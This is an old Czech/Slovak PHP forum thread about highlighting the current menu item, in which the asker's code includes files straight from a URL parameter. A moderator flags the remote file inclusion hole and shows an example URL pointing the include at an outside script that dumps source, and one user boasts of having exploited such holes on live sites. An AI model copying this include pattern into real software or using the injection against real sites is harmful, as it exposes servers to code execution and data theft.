[PHP] Ako urobit polozku v menu vyznacenou? – PHP – Fórum – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

[PHP] Ako urobit polozku v menu vyznacenou? – PHP – Fórum – Programujte.com[PHP] Ako urobit polozku v menu vyznacenou? – PHP – Fórum – Programujte.com

 

Tocimanko0
Grafoman
14. 10. 2007   #1
-
0
-

<div id="menu">

<ul>
<li><a id="selected" href="#">home</a></li>
<li><a href="?id=sluzby">Služby</a></li>
<li><a href="?id=produkty">Produkty</a></li>
<li><a href="?id=download">Download</a></li>
<li><a href="?id=kontakt">KONTAKT</a></li>
</ul>
</div>

To je kod v index.php . V <div id="content"> mam tento kod:
<?php if (!isset($_GET['id'])) $_GET['id']="uvod"; include $_GET['id'].".php"; ?>

Cize sa mi na uvodnej stranke includne uvod.php . Moja otazka znie:
Po kliknuti na jednu polozku z menu (povedzme ?id=sluzby) by sa k polozke "Sluzby" pridala vlastnost id="selected" (pri HOME by sa samozrejme zrusila. Momentalne som v stave, ked nevidim ziadne riesenie kvoli ospalosti ale potrebujem co najskor to vyriesit. Kto mi vie co najjednoduchsie pomoct, nech tak co najskor ucini :) Diky moc krat vsem!

Nahlásit jako SPAM
IP: ...–
ench0
Stálý člen
14. 10. 2007   #2
-
0
-

if ($_GET["id"] == "sluzby"){echo 'id="selected"';}


toto vlož do každého odkazu kde to chceš mít...

ale není to moc príma řešení... :-D

Nahlásit jako SPAM
IP: ...–
I programování je pudová záležitost. Buď to pude, nebo to nepude
survik1
~ Moderátor
0
Posthunter
14. 10. 2007   #3
-
0
-

Být tebou, NEEINCLUDUJu pomocí $_GET. Raději si to ošetři. Tohle je porušení include pravidel a dochází zde k PHP injekci. Na portálu jsou tu nějaké články, tak se můžeš podívat

Nahlásit jako SPAM
IP: ...–
Život je jen hra, která se nedá vyhrát.
Tocimanko0
Grafoman
14. 10. 2007   #4
-
0
-

To survik1: LOL, ako funguje ta injekcia? Da sa takto includnut PHP skript odniekadial inakadial ako zo zadaneho umiestnenia na mojej stranke? :O
To ench: Hmm, toto riesenie ma tiez najprv napadlo, ale neni to nejak komfortne. Kazdopadne je to funkcne riesenie mojho problemu.

Kazdopadne pockam na odpoved survika :)

Nahlásit jako SPAM
IP: ...–
survik1
~ Moderátor
0
Posthunter
14. 10. 2007   #5
-
0
-

To Tocimanko:

odkaz:
?id=sluzby
přepíšu na:
?id=http://web.cz/injekce.php

obsah injekce.php:
<? show_resource(); ?>

následky si domyslíš ;)

Nahlásit jako SPAM
IP: ...–
Život je jen hra, která se nedá vyhrát.
Phoenix0
Super člen
14. 10. 2007   #6
-
0
-

to survik1: co dělá funkce show_resource? nemělo tam bejt spíš show_source("index.php"); ? a to by ti stejně na většině freehostingů neprošlo.

Nahlásit jako SPAM
IP: ...–
survik1
~ Moderátor
0
Posthunter
14. 10. 2007   #7
-
0
-

To Phoenix: na většině ;) A nevím, kam s tímhle může uživatel vykročit, že? Třeba se rozhodne v budoucnu mít vlastní doménu a zaplacený hosting a je lepší utnout chybu v začátcích.
Nj, chybička se vloudila, ale nemám moc času tu takhle reagovat ;)

Nahlásit jako SPAM
IP: ...–
Život je jen hra, která se nedá vyhrát.
survik1
~ Moderátor
0
Posthunter
14. 10. 2007   #8
-
0
-

To Phoenix: jo a to resource, za to se omlouvám...nj, to je to C++ :)

Nahlásit jako SPAM
IP: ...–
Život je jen hra, která se nedá vyhrát.
Phoenix0
Super člen
14. 10. 2007   #9
-
0
-

to survik1: no já sem to nemyslel jako že to tam klidně může nechat;-)
ale ten safe_mode je pro každýho začínajícího "webhackera" velkej problém, protože většina borců co tam tu díru maj má web na freehostingu. Taky sem si s tim jeden čas hrál a pár serióznějších webů sem dal (ale fakt jen pár:))

Nahlásit jako SPAM
IP: 85.70.88.–
Zjistit počet nových příspěvků

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku
Vlož URL adresu obrázku:
Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.
×
 
Podporujeme Gravatara.
Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.
-
Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.
Sledovat nové příspěvky (pouze pro přihlášené)
Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.
Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 33 hostů

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032024 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý